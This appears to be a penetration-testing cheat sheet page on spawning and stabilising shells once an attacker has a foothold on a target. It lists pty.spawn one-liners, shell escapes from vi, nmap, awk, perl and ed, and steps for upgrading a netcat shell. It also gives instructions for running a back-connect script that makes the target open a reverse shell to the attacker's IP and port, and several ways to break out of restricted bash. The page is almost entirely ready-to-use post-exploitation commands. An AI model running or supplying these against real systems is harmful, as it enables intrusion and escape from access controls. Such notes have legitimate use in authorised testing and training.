Spawning a Shell

Hack$Notes

Search…

Hack$Notes

Enumeration

Spawning a Shell

Spawn a shell

The following commands can be used to spawn a shell once you have a foot inside. 
python -c 'import pty; pty.spawn("/bin/sh")' 
python3 -c 'import pty; pty.spawn("/bin/sh")'
​
script -qc /bin/bash /dev/null
​
echo os.system('/bin/bash') 
/bin/sh -i 
perl -e 'exec "/bin/sh";' 
perl: exec "/bin/sh"; 
ruby: exec "/bin/sh" 
lua: os.execute('/bin/sh') 
exec "/bin/sh"; 
/bin/bash -i
exec "/bin/sh"                # (From within IRB) 
:!bash                        # (From within vi)
:set shell=/bin/bash:shell    # (From within vi) 
!sh                           # (From within nmap) 
Method: 
=================== On Kali ===================
CTRL+z                <--- place the netcat connection to background 
stty raw -echo        <--- on your terminal 
fg                    <--- bring back the terminal
stty -a               <--- make a note of rows, columns
​
=================== On Target ===================
export SHELL=bash 
export TERM=xterm256-color  OR  export TERM=xterm
stty rows 38             <--- from notes above.
stty columns 116         <--- from notes above.
Python PTY Shells
Clone the repo https://github.com/infodox/python-pty-shells.git
​
On kali:
1) Make changes to reflect your IP and PORT on tcp_pty_backconnect.py file
2) Pass this file to the target. 
3) python tcp_pty_shell_handler.py -b IP:PORT
​
On target:
1) python tcp_pty_backconnect.py
Escaping RBASH (Restricted Bash)
##############################################
​
ssh [email protected]<IP-Adress> -t "bash --noprofile"
​
##############################################
​
vi
:set shell=/bin/bash
:shell
​
##############################################
​
cd /home
echo $SHELL
ed
!'/bin/bash'
pwd
​
##############################################
​
awk 'BEGIN {system("/bin/bash")}'
cd /home
cd ~
pwd
​
##############################################
​
perl -e 'system("/bin/bash");'

SLmail B.O

Password Attacks

Last modified 1yr ago

Copy link

Outline

Method: